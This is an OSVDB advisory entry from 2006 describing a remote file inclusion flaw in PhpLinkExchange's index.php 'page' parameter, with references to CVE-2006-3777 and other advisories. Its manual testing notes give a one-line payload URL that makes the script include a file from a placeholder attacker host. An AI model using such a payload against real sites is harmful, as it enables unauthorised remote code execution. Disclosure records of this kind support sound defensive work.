PhpLinkExchange index.php page Variable Remote File Inclusion

2006-07-20T04:04:06
ID OSVDB:27410
Type osvdb
Reporter r0t(krustevs@googlemail.com)
Modified 2006-07-20T04:04:06

Description

Vulnerability Description

PhpLinkExchange contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php script not properly sanitizing user input supplied to the 'page' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

PhpLinkExchange contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php script not properly sanitizing user input supplied to the 'page' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/index.php?page=http://[attacker]/file

References:

Vendor URL: http://www.idevspot.com/PhpLinkExchange.php Secunia Advisory ID:21126 Other Advisory URL: http://pridels.blogspot.com/2006/07/phplinkexchange-remote-file-inclusion.html ISS X-Force ID: 27851 FrSIRT Advisory: ADV-2006-2900 CVE-2006-3777 Bugtraq ID: 19083